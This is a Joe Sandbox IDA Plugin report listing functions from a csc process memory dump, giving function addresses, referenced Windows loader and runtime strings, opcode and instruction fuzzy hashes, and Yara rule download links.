Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 3027ab70d6d141eb1992757de028fc10294fbf33711b4d0a52424fe6883c73c7
Instruction ID: 4a9a769cff1bd415cf527c972ec4713905da869d8c9cac7415444d6a48ed49f5
Opcode Fuzzy Hash: 3027ab70d6d141eb1992757de028fc10294fbf33711b4d0a52424fe6883c73c7
Instruction Fuzzy Hash: 2151BD75604742CFC724EFB5C548AABBBE5BF84300F00487EE99A872A0E7749585CF92

Function 056535BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 056535FE
LdrResGetRCConfig Enter, xrefs: 056535EC

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 83f64ab72b700abeb4806a9e6fc2e7534b245ac43776d7dc6af9756cae71ea0d
Instruction ID: c43d260a515ae793c8449d166ccb27bf7f3656ef874d6703f3e7633568b0a4bb
Opcode Fuzzy Hash: 83f64ab72b700abeb4806a9e6fc2e7534b245ac43776d7dc6af9756cae71ea0d
Instruction Fuzzy Hash: 683189323487419BD321DF28D858B2AB7E4BF84BA4F05086DBC558B390EA24D949CB52

Function 055F34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 05632A90
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 05632A95

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 6e3a11c8b69f8e8bb5ef7700c4dbcfa65c6017a69694383675236f7bb431372f
Instruction ID: 4f04958cdeb8880771f8ecd4dec413f32ba808d73ee670c09f9fd2344c9cb0df
Opcode Fuzzy Hash: 6e3a11c8b69f8e8bb5ef7700c4dbcfa65c6017a69694383675236f7bb431372f
Instruction Fuzzy Hash: 62110672B04205EBE7358A588D4AF6F76A9FB84B54F1584297A05EB344EA74CD00C7E0

Function 055FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 055FA5E4
Threadpool!, xrefs: 055FA5E9

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 22d3ca5674013f605fb0cebb6a7410e9f9de40b3af7cc00e0493775b1864c770
Instruction ID: 6204f243dbcaf108a2597a6e9784e59604cab98dcdbcf12a0e4a9bdbc158d2f5
Opcode Fuzzy Hash: 22d3ca5674013f605fb0cebb6a7410e9f9de40b3af7cc00e0493775b1864c770
Instruction Fuzzy Hash: 0401D1B2654704AFE312DF24CD4AB1677E8FB44715F008939B64CC7190E774D844CB46

Function 055CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 055CC8C3, 055CCA40

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 6f12a72a0cb4232935467a67efb9adae1a596bf20c9f34a47a3a761a8005f18f
Instruction ID: 6e0cfbcf3246fdb2626a9de73e092439c4572c70b7e6d8d6496f898a6607b875
Opcode Fuzzy Hash: 6f12a72a0cb4232935467a67efb9adae1a596bf20c9f34a47a3a761a8005f18f
Instruction Fuzzy Hash: 00824975E042589FDB24CFE9C884BADBBB6BF48710F1481ADD86AEB250D770AD41CB50

Function 055FF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee5f25f47465281040a6a98a18e3a9d0ba935227a606dd5c190cef5fccc5fd73
Instruction ID: ace64eccbdbe3e860badacaf044ce538c1864fc550c4e492920fa67413ff0e60
Opcode Fuzzy Hash: ee5f25f47465281040a6a98a18e3a9d0ba935227a606dd5c190cef5fccc5fd73
Instruction Fuzzy Hash: 79416C75E00288EFDB24CFA9D480AAEBBF4FF48300F50452EE959A7211DB30A940CF64

Function 05646420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 056465C1

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3928c036e2dd5d17c93f95b3555bff99c93ff1c4b09b178f65bc378f27492750
Instruction ID: 1573feef392fc450022c38ff282e3cff0764f595b869901ef5304e3bb3aafaf2
Opcode Fuzzy Hash: 3928c036e2dd5d17c93f95b3555bff99c93ff1c4b09b178f65bc378f27492750
Instruction Fuzzy Hash: D7916072A40219AFDB25DF94CD85FAEB7B9FF49750F110065F601AB290D774AD00CBA1

Function 055FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 056367C9

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 1e5a3a2de276eb182334a69fcd6f5a6fdc75980c76ef195a07969eaba283ca6e
Instruction ID: 3990cb0cf85cc627f3a20fd66ef1935372bb731606a9f672a15ae9009d0f1d46
Opcode Fuzzy Hash: 1e5a3a2de276eb182334a69fcd6f5a6fdc75980c76ef195a07969eaba283ca6e
Instruction Fuzzy Hash: BA717F75E0421AEFDF68CF98D591AEDBBB2BF48704F14812EE806A7740E7709941CB64

Function 055C973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 055C97F3

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: fe13277d36bf272f9b60a03bbee194b2051b57c49d535c68c07947f208a39e58
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: 6B618976D04619AFDF21DFA9C844BEEBBB5FF80710F1445ADE811A7290D774AA01CBA0

Function 0564F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 0564F867

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: 25646ac61b469626e56723f5b9f8dda122658f9051ec23f62747ea8aea54f7ab
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: 0E518972618705AFE721EF54C844F6BF7E8FB84750F000929B9809B690E7B4ED04CBA6

Function 055DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 055DE6A4

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: ddeee2f67b0479b27ee0ed138ff341fdc721c14b8891f78f9af028066d393d94
Instruction ID: 7a278a40e8cb779a712a78039a8d21b1daa34f3085a505e1211f4bed96f6b1a1
Opcode Fuzzy Hash: ddeee2f67b0479b27ee0ed138ff341fdc721c14b8891f78f9af028066d393d94
Instruction Fuzzy Hash: F9418F73608352ABD761DA68C885B6BF7ECBF88B04F44092DF585DB180EA74D904C7A7

Function 0563C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0563C77F

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: ae0afe0c55be371772b542eaf810529d2e55b1eef3adb121f0034eb9e8193ee5
Instruction ID: 3563f48e435f23bb11524ddd2e89cc7224193a9fea9e1654b15be38aa8ec8794
Opcode Fuzzy Hash: ae0afe0c55be371772b542eaf810529d2e55b1eef3adb121f0034eb9e8193ee5
Instruction Fuzzy Hash: A94114B1D0052DAAEB21DA50CC85FDEB77DAF45714F0045A9FA09B7140DB709E89CFA8

Function 056497A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 05649870

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 8f933cba0c0da75b02788a8400f6f7568912c25cca1b1e116dccabb97610f180
Instruction ID: 23e92c7496f0dcab8a6b381794d7db11362c38a2f5d7835efee81d44c40a3060
Opcode Fuzzy Hash: 8f933cba0c0da75b02788a8400f6f7568912c25cca1b1e116dccabb97610f180
Instruction Fuzzy Hash: A2319F717502069FDB749E2C9861A77B6E6FB98310F54887AE6069B780EA718C80CB90

Function 055F7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 05634622

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: b04f558e11694e0d4f0a81373a738e5830209ca7788f6c4568bbd8afd247f745
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: 6441A375A14616EBCF25DF48C494BBEB7B6FF89701F00446AEA4697240DB30D981CBE1

Function 055F36EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Flst, xrefs: 055F3731

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: 5280a172a94e30733906605e43d9326bf681b62937baec303916cd6b716f5d0b
Instruction ID: 5b974d4f3901d74941d81bbc4781bb855b975a3e95b7d159f6c498fa7b6e544f
Opcode Fuzzy Hash: 5280a172a94e30733906605e43d9326bf681b62937baec303916cd6b716f5d0b
Instruction Fuzzy Hash: E441BCB120A301DFD714CF18C084A26FBE5FB89714F15896EE54ACF241EB31DA86CBA1

Function 055B9730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

L4CwL4Cw, xrefs: 055B97A7

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID: L4CwL4Cw
API String ID: 0-1654103815
Opcode ID: 44ff88fff6cae04bcbfda7b5bbb483234d91ca951106f4e7c4a8d4b175bcfb6c
Instruction ID: 2e57af39cc7361766d05503056499e8e9d7d89a2bbe72c5e4ce748a23d7f356f
Opcode Fuzzy Hash: 44ff88fff6cae04bcbfda7b5bbb483234d91ca951106f4e7c4a8d4b175bcfb6c
Instruction Fuzzy Hash: 2821F876B00615ABE3329F18C408B9ABBF5FFC5B50F150829AA559B750DBB0DC00CB90

Function 05658158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 224d2fb93b578ca1a0f7a5c3cd3601b0858d27a1005699849bdc6132b3f7983d
Instruction ID: 9bbcad147d751092b38e62b8eb2013171894952587bbca8a320af5a0f4367c49
Opcode Fuzzy Hash: 224d2fb93b578ca1a0f7a5c3cd3601b0858d27a1005699849bdc6132b3f7983d
Instruction Fuzzy Hash: A3426C71A402198FEB24CF69C881BADB7F6FF88310F248199E949EB741DB349985CF50

Function 056816CC Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53d63eda18d02c0c742c617d037fea2bc47c8495a845cd39e42fe987ce8f294
Instruction ID: baed9e17e0ea267289761e747c4905a6affe91a221dfbc372968cfa683830512
Opcode Fuzzy Hash: a53d63eda18d02c0c742c617d037fea2bc47c8495a845cd39e42fe987ce8f294
Instruction Fuzzy Hash: F1229135B042168FCB19DF58C490ABAB7B2BF8A314B28466DD856DB745DB30E943CB90

Function 055C65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3283b5dbcd86c4d4d0649c022993380b64f21b887fc17a8b4ea7606aa9163a97
Instruction ID: d951554a4bc638338de674a9b1ed51098b016c9b325985c988c1d286127b5815
Opcode Fuzzy Hash: 3283b5dbcd86c4d4d0649c022993380b64f21b887fc17a8b4ea7606aa9163a97
Instruction Fuzzy Hash: 5BE18F75608341CFC714CF6CC094A6ABBE1FF89314F0589ADE9998B351DB31EA45CB92

Function 055CD7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8d8693c17e755836f0ebb41f16bb5cc68ed9c6dceb624c2f71a6f8fa26ec65
Instruction ID: 59bc8957c5ed539490820d815c04ddfa3a2b43ef5aec3adef7b64936a7f10bcb
Opcode Fuzzy Hash: 4f8d8693c17e755836f0ebb41f16bb5cc68ed9c6dceb624c2f71a6f8fa26ec65
Instruction Fuzzy Hash: 08C18271A046169FDF14CF99C844BBABBB6BF84710F1482ADD815EB780DB74A941CB81

Function 055DF460 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407a903d11a89ae3113c23b62492b7bcef2491d860d9754c9d73e290751e6db3
Instruction ID: 84950ca677c9e19798a2335ba8c3949c8df6f09078141b51a3e6f73662deeabb
Opcode Fuzzy Hash: 407a903d11a89ae3113c23b62492b7bcef2491d860d9754c9d73e290751e6db3
Instruction Fuzzy Hash: A8C1DC72A052258BDB34CF1CC4A4BB9B7A2FF84714F194159EC479B7A1EB318981CBB0

Function 055D0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: ea96331bc8a8fc49305e2877672c6926713304bcf7ec7c245cf5f9229a69ae70
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: C4B1E232704A55EFDB25DB68C858BBEFBF6BF84200F140559D5529B391EB30EA41CBA0

Function 055BC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b308799695d9ebf321cdd3cead2869d7322c1dedf6aa5ef2c743a1c5be5d6cab
Instruction ID: 332025032cce4c8792178a63623106ab66a9b378d8e75dc9c70487c236b196eb
Opcode Fuzzy Hash: b308799695d9ebf321cdd3cead2869d7322c1dedf6aa5ef2c743a1c5be5d6cab
Instruction Fuzzy Hash: CCB16270B042568BEB34CF54C894BB9B3B6FF84704F0485EAD44AE7280EB709E85CB65

Function 055EE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fb0c3cd215fd39b8ce1f2352040952994d5dc2fa817d15fae1c7b8b01d410ac
Instruction ID: 3176883ec214794f724cef3556c203e1022a94059dc26a49b5d4da3becb31836
Opcode Fuzzy Hash: 9fb0c3cd215fd39b8ce1f2352040952994d5dc2fa817d15fae1c7b8b01d410ac
Instruction Fuzzy Hash: 58A11531F14A689FEB25DB58C84AFAEBBBABF01754F050125E901AB290DB749D40CBD1

Function 05694500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70387c3fa08bf0e294f858670f8726af281e7d006734c163987ca8974d878609
Instruction ID: bc9b33e74fdd44e3f3eb09483d3904bb41eafffd1dca4c2d7ea44fe6111bcbbb
Opcode Fuzzy Hash: 70387c3fa08bf0e294f858670f8726af281e7d006734c163987ca8974d878609
Instruction Fuzzy Hash: 47A1CC72A14211AFCF29DF18C984B6AB7EAFF88705F010928F585DB750DB74E842CB91

Function 055C9486 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true

Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5590000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1f8cc47a7fddf9b2f8b8bba3229e6a8cc6120fd412d7890a05688a65159bcb8
Instruction ID: 964fdf1a23dcabb989b520d53c9a1791e1e2d30522b5c85f3e70ab3c04a27211
Opcode Fuzzy Hash: a1f8cc47a7fddf9b2f8b8bba3229e6a8cc6120fd412d7890a05688a65159bcb8
